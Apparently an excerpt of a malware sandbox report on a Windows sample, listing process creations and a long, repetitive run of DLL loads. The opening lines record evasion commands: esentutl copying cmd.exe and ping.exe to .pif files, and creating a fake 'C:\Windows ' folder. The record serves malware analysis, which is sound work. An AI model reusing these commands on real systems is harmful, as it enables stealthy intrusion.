Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe

Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
